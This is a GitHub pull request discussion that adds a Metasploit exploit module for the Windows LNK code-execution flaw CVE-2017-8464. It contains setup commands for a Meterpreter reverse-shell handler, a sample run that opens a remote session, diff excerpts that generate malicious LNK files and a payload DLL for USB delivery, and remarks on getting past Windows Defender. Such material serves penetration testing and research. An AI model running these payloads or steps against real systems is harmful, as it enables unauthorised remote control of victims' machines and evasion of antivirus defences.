### PR TITLE
Add exploit module for CVE-2017-8464 LNK Code Execution Vulnerability

### PR DESCRIPTION
**Pull request by ykoster**
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.

This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file.

## Verification
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, make sure that MS10-046 & MS15-020 are installed.

### Start a handler
- [x] `use exploit/multi/handler`
- [x] `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
- [x] `set LHOST [ip victim connects back to]`
- [x] `exploit -j`
- [x] `back`

### Run the exploit

- [x] `use exploit/windows/fileformat/cve_2017_8464_lnk_rce`
- [x] `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
- [x] `set LHOST [ip victim connects back to]`
- [x] `exploit`

### Copy files to USB drive & open on vulnerable system

- [x] `cp /root/.msf4/local/* [USB drive path]`
- [x] Insert device in target machine and browse to it

Sample run:
```
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.146.197:4444 
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(cve_2017_8464_lnk_rce) > exploit

msf exploit(cve_2017_8464_lnk_rce) > exploit

[*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive
[*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive
[*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive
[*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive
[*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive
[*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive
[*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive
[*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive
[*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive
[*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive
[*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive
[*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive
[*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive
[*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive
[*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive
[*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive
[*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive
[*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
msf exploit(cve_2017_8464_lnk_rce) > 
[*] Sending stage (1189423 bytes) to 192.168.146.193
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-5G8HK7E
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 
```

### CODE REVIEW

File: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb [hunk 1]
```diff
@@ -0,0 +1,177 @@
...
+
+  def exploit
+    dll = generate_payload_dll
+    dll_name = "#{rand_text_alpha(16)}.dll"
+    dll_path = store_file(dll, dll_name)
+    print_status("#{dll_path} created copy it to the root folder of the target USB drive")
+
+    # HACK the vulnerability doesn't appear to work with UNC paths
+    # Create LNK files to different drives instead
+    'DEFGHIJKLMNOPQRSTUVWXYZ'.split("").each do |i|
```
Comment (nixawk) [inline modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb]:
```
irb(main):001:0> ('D'..'Z').each {|v| print "#{v} "}
D E F G H I J K L M N O P Q R S T U V W X Y Z => "D".."Z"
```

File: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb [hunk 2]
```diff
@@ -0,0 +1,177 @@
...
+          'Uncredited',   # vulnerability discovery
+          'Yorick Koster' # msf module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['CVE', '2017-8464'],
+          ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
+          ['URL', 'http://paper.seebug.org/357/'], # writeup
+          ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup
```
Comment (nixawk) [inline modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb]: Please add a reference link:

- **[MS-SHLLINK]: Shell Link (.LNK) Binary File Format** - `https://msdn.microsoft.com/en-us/library/dd871305.aspx`

File: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb [hunk 3]
```diff
@@ -0,0 +1,177 @@
...
+      0x00, 0x00, 0x00, 0x00, # ShowCommand
+      0x00, 0x00, # HotKey
+      0x00, 0x00, # Reserved1
+      0x00, 0x00, 0x00, 0x00, # Reserved2
+      0x00, 0x00, 0x00, 0x00  # Reserved3
+    ].pack('C*')
+
+    # IDList
+    idlist_data = ''
+    idlist_data << [0x12 + 2].pack('v') # ItemIDSize
```
Comment (nixawk) [inline modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb]: It's better to comment the number **2** in `[0x12 + 2]`. 

```
ItemID = ItemIDSize (2 bytes) + Data (variable)
```

**Comment by wwebb-r7** [comment]
Just a heads-up, the bindata gem is now in framework.  You may want to consider using it in the future (if there's something peculiar about LNK files that doesn't translate well in this instance, forget I said anything).

I myself am not going to request that you change it this time around as I don't believe we've codified it as a requirement yet, but it does make dealing with things like this in Ruby much less frustrating

**Comment by nixawk** [comment]
I'v tested it against my lab. Explorer crashes.

```
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               X86-based PC
```

**Comment by nixawk** [comment]
@ykoster Good job. The pr needs more test.  It crashes my explorer.exe.


```
Problem signature:
  Problem Event Name:	APPCRASH
  Application Name:	explorer.exe
  Application Version:	6.1.7601.23537
  Application Timestamp:	57c44cc4
  Fault Module Name:	ntdll.dll
  Fault Module Version:	6.1.7601.23714
  Fault Module Timestamp:	58bf8774
  Exception Code:	c0000005
  Exception Offset:	0002ad83
  OS Version:	6.1.7601.2.1.0.256.1
  Locale ID:	1033
  Additional Information 1:	a7aa
  Additional Information 2:	a7aa91f17ea749d42a4de3b390fa5b3d
  Additional Information 3:	a7aa
  Additional Information 4:	a7aa91f17ea749d42a4de3b390fa5b3d

Read our privacy statement online:
  http://go.microsoft.com/fwlink/?linkid=104288&clcid=0x0409

If the online privacy statement is not available, please read our privacy statement offline:
  C:\Windows\system32\en-US\erofflps.txt
```

**Comment by ykoster** [comment]
@nixawk will test on more VMs/OSes

File: documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md [hunk 4]
```diff
@@ -0,0 +1,106 @@
...
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf exploit(handler) > set LHOST 192.168.146.197
+LHOST => 192.168.146.197
+msf exploit(handler) > exploit -j
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 192.168.146.197:4444 
+[*] Starting the payload handler...
+msf exploit(handler) > back
+msf > use exploit/windows/smb/cve_2017_8464_lnk_rce
```
Comment (nixawk) [inline documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md]:
```
use exploits/windows/fileformat/cve_2017_8464_lnk_rce
```

**Comment by ykoster** [comment]
@nixawk so if I understand correctly. Explorer crashes, but you have a Meterpreter session?

That is the same on my machine. Essentially it uses the same method as ms15_020_shortcut_icon_dllloader.rb. I tried different EXITFUNC settings, but can't prevent Explorer from crashing. Haven't really looked into it, but may be related to the fact that CPlApplet() is not exported.

**Comment by nixawk** [comment]
@ykoster 

- Windows XP SP3 English: everything goes well, no exception.
- Windows 7 English X86: explorer.exe crashes, but msf gains a meterpreter session.

I've tried to use `EXITFUNC` (seh, process, thread), but failed to make it stable.

File: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb [hunk 5]
```diff
@@ -0,0 +1,204 @@
...
+    end
+  end
+
+  def generate_link(path)
+    path << "\x00"
+    display_name = "Flash Player\x00" # LNK Display Name
+    comment = "\x00"
+
+    # Control Panel Applet ItemID with our DLL
+    cpl_applet = [
```
Comment (nixawk) [inline modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb]: Is there a better way to create an stable **cpl_applet** ?

Comment (ykoster) [inline modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb]: There is almost no documentation about this structure. At least not that I could find.

With regards to crashing of Explorer, there is an explicit ExitThread(0) in the template DLL. I think this causes the crashes. If I patch it out, Explorer doesn't crash, but the payload runs multiple times. I guess I'll have to replace the template DLLs with my own. See also: https://github.com/rapid7/metasploit-framework/blob/master/data/templates/src/pe/dll/template.c

**Comment by ykoster** [comment]
@nixawk added new DLL templates. Successfully tested on:

Windows 7 x64 (Build 7601, Service Pack 1)
Windows 8.1 x64 (Build 9600)
Windows 10 x64 (Build 14393)

Would it be possible if you test it on Windows 7 x86?

**Comment by nixawk** [comment]
@ykoster In order to improve the pr, A py poc is built. https://github.com/nixawk/labs/blob/master/CVE-2017-8464/exploit_CVE-2017-8464.py

**Comment by ykoster** [comment]
@jooeji I removed the This PC ItemID from the LinkTargetIDList. This seems enough to bypass Defender at this moment. Could you give it a try?

**Comment by fsacer** [comment]
weird getting failed to loadmodule with latest commit

**Comment by jooeji** [comment]
the FlashPlayerCPLApp.cpl also is detected poison,but the .lnk isn`t  detected poison

**Comment by ykoster** [comment]
Thanks for testing @jooeji. There is not a lot I can do to prevent the Meterpreter payload from being detected. If I did it will only be a matter of time before the chances will be detected. You can always use a different payload or provide a DLL yourself.

I also expect that the changed LNK file will be flagged again in the near future. My goal with this module is not to evade AV.

**Comment by ykoster** [comment]
Added source code for template DLLs

**Comment by 3gstudent** [comment]
Small change,my explorer.exe doesn't crash. 
:)

**Comment by ykoster** [comment]
@3gstudent the last commits contain new template DLL files that also don't crash. Make sure to checkout all the files

**Comment by 3gstudent** [comment]
@ykoster Good job :)

**Comment by busterb** [comment]
@ykoster it seems that this PR is corrupted with some double-commits. I'm going to fix up the remote branch before landing so that it doesn't cause problems in the master tree later. You will need to do a force update locally, but nothing will be lost.

**Comment by ykoster** [comment]
@busterb okay, not sure why this happened, but let me know what I can do to help.

**Comment by busterb** [comment]
Something interesting I have seen in testing with 64-bit on Windows 10 is multiple sessions when clicking the lnk once. I have gotten up to 13 sessions on one click.

**Comment by ykoster** [comment]
@busterb that is correct it invokes DllMain multiple times. It currently uses a mutex that is released after 2,5 seconds to try to avoid this, but this is not perfect. If I set the timeout in WaitForSingleObject to infinite it will hang Explorer. An alternative would be to use CreateEvent, but than it will only run once during the user's sessions. See also https://github.com/ykoster/metasploit-framework/blob/c3bc27385e09873134296ebca9c8a1361b3b74cc/data/exploits/cve-2017-8464/src/template.c

**Comment by ykoster** [comment]
Now that I look at it again, I think I messed up the Mutex... Commented out the GetLastError() check. Will look at it later today.

**Comment by busterb** [comment]
Well as @mubix would say, two is one and one is none :)

**Comment by busterb** [comment]
As far as the git work, I cleaned it all up and the public branch should be good. Just pull in the updates locally before making any commits yourself.

I have some general cleanup (just stuff that the linter whines about) and added auto-targeting support for this as well - should I just push to your branch or send a PR?

**Comment by busterb** [comment]
Pushed a PR to you: https://github.com/ykoster/metasploit-framework/pull/1

**Comment by ykoster** [comment]
Thank you for the cleanup @busterb :). I've updated the template DLLs that should in theory reduce the number of times the payload is invoked.

**Comment by busterb** [comment]
cool - tested and works ok

**Comment by busterb** [comment]
## Release Notes

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.

This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file.

**Comment by ykoster** [comment]
@ExplosiveBattery you can test the DLL by double clicking on the LNK file. You may also want to run Process Monitor to see if your DLL is loaded by Explorer.

**Pull request merged**